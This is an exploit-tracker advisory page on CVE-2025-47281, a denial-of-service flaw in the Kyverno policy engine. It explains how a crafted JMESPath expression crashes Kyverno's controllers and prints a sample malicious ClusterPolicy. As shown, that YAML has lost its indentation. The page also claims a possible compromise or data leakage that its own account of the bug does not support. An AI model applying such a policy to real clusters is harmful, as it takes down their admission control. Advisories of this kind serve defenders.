Ameeba Exploit Tracker

Tracking CVEs, exploits, and zero-days for defensive cybersecurity research.

Ameeba Blog Search
TRENDING · 1 WEEK
Attack Vector
Vendor
Severity

CVE-2025-47281: Denial of Service Vulnerability in Kyverno Policy Engine

Ameeba Chat Store screens
Download Ameeba Chat

Overview

A severe vulnerability identified as CVE-2025-47281 has been discovered in the Kyverno policy engine, a tool often utilized by cloud-native platform engineering teams. This flaw, affecting versions 1.14.1 and below, could allow attackers to cause a Denial of Service (DoS), potentially leading to system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-47281
Severity: High (7.7 CVSS)
Attack Vector: Network
Privileges Required: Low
User Interaction: None
Impact: Denial of Service, potential system compromise, and data leakage

Affected Products

Ameeba Chat Icon Escape the Surveillance Era

Most apps won’t tell you the truth.
They’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

Kyverno Policy Engine | 1.14.1 and below

How the Exploit Works

The vulnerability arises due to the improper handling of JMESPath variable substitutions in Kyverno. Attackers with permissions to create or update Kyverno policies can craft expressions using the {{@}} variable combined with a pipe and an invalid JMESPath function. This leads to a nil value being substituted into the policy structure. Subsequent processing by internal functions, specifically getValueAsStringMap, which expect string values, result in a panic due to a type assertion failure. This crashes Kyverno worker threads in the admission controller and causes continuous crashes of the reports controller pod.

Conceptual Example Code

Consider the following example of a malicious policy:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: exploit-cve-2025-47281
spec:
rules:
- name: exploit
match:
resources:
kinds:
- Pod
mutate:
overlay:
spec:
containers:
- (name): "*"
resources:
limits:
cpu: "{{@ | non_existent_function }}"

In this example, the attacker crafts a malicious expression (`{{@ | non_existent_function }}`) that leads to a nil value being substituted into the policy structure, triggering the vulnerability.

Want to discuss this further? Join the Ameeba Cybersecurity Group Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.
Ameeba Chat